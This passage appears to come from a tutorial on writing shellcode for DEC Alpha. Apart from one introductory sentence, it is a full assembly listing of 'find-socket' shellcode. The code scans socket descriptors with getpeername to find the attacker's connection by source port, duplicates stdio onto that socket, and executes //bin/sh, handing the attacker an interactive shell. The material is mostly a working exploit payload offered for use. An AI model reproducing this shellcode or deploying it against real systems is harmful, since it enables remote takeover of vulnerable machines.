Additionally, we can use the same methods to create find-socket shellcode. The following shellcode will reuse the already initiated tcp connection with the remote process, duplicate the stdio descriptors and execute the shell interpreter, thus creating an interactive telnet-like session for the attacker.
#include <alpha/regdef.h> #include <alpha/pal.h> .text .arch generic .align 4 .globl main .ent main main: .frame $sp, 0, #xorloop will give us the pc in a0 bic sp, 0xf, sp #make sure the stack is 16 byte aligned. addq a0, 0xa0, s4 #address of //bin/sh stq s4, (sp) #store address of //bin/sh stq zero, 8(sp) mov 0x10, t0 stq t0, 16(sp) #sizeof(struct sockaddr_in) lda s2, 16(sp) #address of sizeof(struct sockaddr_in) lda s1, 24(sp) #address of sockaddr_in bis zero, zero, s0 lda s0, 0xff(zero) #set counter for the getpeername loop. bis zero, zero, s3 #zero out s3 mov 0x3412, s3 #src port of peer sll s3, 0x30, s3 srl s3, 0x30, s3 getpeerloop: mov s0, a0 #socket number. mov s1, a1 #address of sockaddr_in mov s2, a2 #address of sizeof(struct sockaddr_in) addq zero, 0x8d, v0 #getpeername syscall. PAL_callsys bne v0, again ldl t0, 24(sp) sll t0, 0x20, t0 srl t0, 0x30, t0 subq t0, s3, t0 beq t0, out #check if we have a matching source port. again: subq s0, 0x1, s0 bge s0, getpeerloop out: mov 0x2, s2 duploop: mov s0, a0 #socket number mov s2, a1 #stdin, stdout, stderr addq zero, 0x5a, v0 #dup2 syscall PAL_callsys subq s2, 0x1, s2 #decrement the counter. bge s2, duploop #loop for 2,1,0 (stderr, stdout, stdin) mov s4, a0 #address of //bin/sh mov sp, a1 #address of (address of //bin/sh) bis zero, zero, a2 #NULL addq zero, 0x3b, v0 #execve syscall PAL_callsys .long 0x00000000 .quad 0x68732f6e69622f2f .long 0x00000000 .end main